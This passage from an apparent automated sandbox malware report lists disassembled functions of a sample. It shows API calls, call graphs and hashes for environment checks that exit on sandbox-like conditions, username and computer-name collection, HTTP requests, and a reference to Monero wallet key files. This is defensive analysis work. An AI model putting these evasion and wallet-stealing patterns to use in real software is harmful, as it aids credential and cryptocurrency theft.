                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 83a966d59de635146385181dc2708c8775676a659d7bcbd10076bcf98bd192c5
                                        • Instruction ID: 915a4fff43fbbfa63e48397389c6c7e686254387625858f9746856247c7c5782
                                        • Opcode Fuzzy Hash: 83a966d59de635146385181dc2708c8775676a659d7bcbd10076bcf98bd192c5
                                        • Instruction Fuzzy Hash: BE4182B1D04258AFDF10DFA4DC95BEEBBB8AF58700F140199F5097B280DB746A48CBA5
                                        Function 00CB69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1738), ref: 00CB98A1
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1768), ref: 00CB98BA
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1678), ref: 00CB98D2
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1618), ref: 00CB98EA
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1510), ref: 00CB9903
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D8B48), ref: 00CB991B
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009C55E8), ref: 00CB9933
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009C5408), ref: 00CB994C
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D16F0), ref: 00CB9964
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D16D8), ref: 00CB997C
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D15B8), ref: 00CB9995
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D1690), ref: 00CB99AD
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009C5448), ref: 00CB99C5
                                          • Part of subcall function 00CB9860: GetProcAddress.KERNEL32(77190000,009D15A0), ref: 00CB99DE
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CA11D0: ExitProcess.KERNEL32 ref: 00CA1211
                                          • Part of subcall function 00CA1160: GetSystemInfo.KERNEL32(?), ref: 00CA116A
                                          • Part of subcall function 00CA1160: ExitProcess.KERNEL32 ref: 00CA117E
                                          • Part of subcall function 00CA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CA112B
                                          • Part of subcall function 00CA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00CA1132
                                          • Part of subcall function 00CA1110: ExitProcess.KERNEL32 ref: 00CA1143
                                          • Part of subcall function 00CA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CA123E
                                          • Part of subcall function 00CA1220: __aulldiv.LIBCMT ref: 00CA1258
                                          • Part of subcall function 00CA1220: __aulldiv.LIBCMT ref: 00CA1266
                                          • Part of subcall function 00CA1220: ExitProcess.KERNEL32 ref: 00CA1294
                                          • Part of subcall function 00CB6770: GetUserDefaultLangID.KERNEL32 ref: 00CB6774
                                          • Part of subcall function 00CA1190: ExitProcess.KERNEL32 ref: 00CA11C6
                                          • Part of subcall function 00CB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
                                          • Part of subcall function 00CB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00CB7887
                                          • Part of subcall function 00CB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F
                                          • Part of subcall function 00CB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7910
                                          • Part of subcall function 00CB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CB7917
                                          • Part of subcall function 00CB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009D8B68,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB6AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00CB6AF9
                                        • Sleep.KERNEL32(00001770), ref: 00CB6B04
                                        • CloseHandle.KERNEL32(?,00000000,?,009D8B68,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6B1A
                                        • ExitProcess.KERNEL32 ref: 00CB6B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: 7e03763cbd612ffb0e14a925498be071eb8c1968116b035f2bd0f561ac1aeafb
                                        • Instruction ID: 8496e55656b0c8206f73adf5bf4f3216a7f3d4969fe64f5f9ea6c4fa50f79360
                                        • Opcode Fuzzy Hash: 7e03763cbd612ffb0e14a925498be071eb8c1968116b035f2bd0f561ac1aeafb
                                        • Instruction Fuzzy Hash: 3E312770D10209AADB04FBF1DC96BEE7738AF04300F544528F652A61C2EF746A05EAA2
                                        Function 00CA1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1436 ca1220-ca1247 call cb89b0 GlobalMemoryStatusEx 1439 ca1249-ca1271 call cbda00 * 2 1436->1439 1440 ca1273-ca127a 1436->1440 1442 ca1281-ca1285 1439->1442 1440->1442 1443 ca129a-ca129d 1442->1443 1444 ca1287 1442->1444 1446 ca1289-ca1290 1444->1446 1447 ca1292-ca1294 ExitProcess 1444->1447 1446->1443 1446->1447
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CA123E
                                        • __aulldiv.LIBCMT ref: 00CA1258
                                        • __aulldiv.LIBCMT ref: 00CA1266
                                        • ExitProcess.KERNEL32 ref: 00CA1294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: 4bfc715bfb9e6cd45f27daa75afa44d201c3afc62f8ec12a70bdc3e0300132a9
                                        • Instruction ID: 18c0551be2427dc2adb3d39c14e9ebe54fd9480f9ec65772b62405b8cf43309b
                                        • Opcode Fuzzy Hash: 4bfc715bfb9e6cd45f27daa75afa44d201c3afc62f8ec12a70bdc3e0300132a9
                                        • Instruction Fuzzy Hash: D5016DB0D40308BAEF10DBE0CC89B9EBB78AB04705F288158FB05BA2C0D774A6459799
                                        Function 00CB6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1450 cb6af3 1451 cb6b0a 1450->1451 1453 cb6aba-cb6ad7 call cbaad0 OpenEventA 1451->1453 1454 cb6b0c-cb6b22 call cb6920 call cb5b10 CloseHandle ExitProcess 1451->1454 1459 cb6ad9-cb6af1 call cbaad0 CreateEventA 1453->1459 1460 cb6af5-cb6b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009D8B68,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB6AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00CB6AF9
                                        • Sleep.KERNEL32(00001770), ref: 00CB6B04
                                        • CloseHandle.KERNEL32(?,00000000,?,009D8B68,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6B1A
                                        • ExitProcess.KERNEL32 ref: 00CB6B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 32a4f01c48e9acbc39bfbbe2be69f3372aa44544b97119ecbb3a52619829fe4d
                                        • Instruction ID: f924487edf292413a23a6128df6d448eccec2ec1fdcac738afa29f93f6c61bde
                                        • Opcode Fuzzy Hash: 32a4f01c48e9acbc39bfbbe2be69f3372aa44544b97119ecbb3a52619829fe4d
                                        • Instruction Fuzzy Hash: 31F05E7094021DAFEB00EBA1DC4ABFD7B38EB04701F144529F552B51C1CBB46544FA6A
                                        Function 00CA47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: d882a4735ea7c6bd574b80201d5df844fa4f3e378e2a6351616e893212fc8294
                                        • Instruction ID: cfdd5624c028b6e4bce44cdd46ebff09cd839ec5db091a9fa7b219ec3bed8d6d
                                        • Opcode Fuzzy Hash: d882a4735ea7c6bd574b80201d5df844fa4f3e378e2a6351616e893212fc8294
                                        • Instruction Fuzzy Hash: C02150B1D00209ABDF10DF54E849ADE7B74FB44310F008625F955B72C0EB706609DF91
                                        Function 00CB51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA6280: InternetOpenA.WININET(00CC0DFE,00000001,00000000,00000000,00000000), ref: 00CA62E1
                                          • Part of subcall function 00CA6280: StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA6303
                                          • Part of subcall function 00CA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA6335
                                          • Part of subcall function 00CA6280: HttpOpenRequestA.WININET(00000000,GET,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA6385
                                          • Part of subcall function 00CA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CA63BF
                                          • Part of subcall function 00CA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CA63D1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5228
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 64bee97d41329045c40e94a5b8332e7eaec94b365e08c33eaab36edcc578d41a
                                        • Instruction ID: cf0506dbf7c87f70c65e98d1d649f36e902ce8a410d4929f5a9d8e63b5c6742a
                                        • Opcode Fuzzy Hash: 64bee97d41329045c40e94a5b8332e7eaec94b365e08c33eaab36edcc578d41a
                                        • Instruction Fuzzy Hash: D0110030910148BBDB14FFA5DD52EED7778AF50300F404168F95A5B592EF31AB05EA92
                                        Function 00CA1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00CA112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00CA1132
                                        • ExitProcess.KERNEL32 ref: 00CA1143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: f445ef014d975e221957385963abc295e58fbd5a9909f859127a6e0e550cd412
                                        • Instruction ID: 3dda43c98347bbdfc20c740c2642f3ad801bd65e647688867c77ff6bf7badbe8
                                        • Opcode Fuzzy Hash: f445ef014d975e221957385963abc295e58fbd5a9909f859127a6e0e550cd412
                                        • Instruction Fuzzy Hash: 2FE0867094534CFFE710ABA19C0EB0C7AB8AB04B05F144059F7097A1C0D6B436049699
                                        Function 00CA10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00CA10B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00CA10F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 8e09109fe562589089343e9d9ede4f7d0fcca9ece322763bf0b6afb5bd89ed49
                                        • Instruction ID: 66d8734102258660f9c718ee8e025cb43baf3f55f6d0ae033465c0e5d9488cbd
                                        • Opcode Fuzzy Hash: 8e09109fe562589089343e9d9ede4f7d0fcca9ece322763bf0b6afb5bd89ed49
                                        • Instruction Fuzzy Hash: 34F0E271641208BBEB149AA4AC89FAAB7ECE705B15F300458F904E7280D571AF04DAA4
                                        Function 00CA1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7910
                                          • Part of subcall function 00CB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00CB7917
                                          • Part of subcall function 00CB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F
                                          • Part of subcall function 00CB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
                                          • Part of subcall function 00CB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00CB7887
                                          • Part of subcall function 00CB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F
                                        • ExitProcess.KERNEL32 ref: 00CA11C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
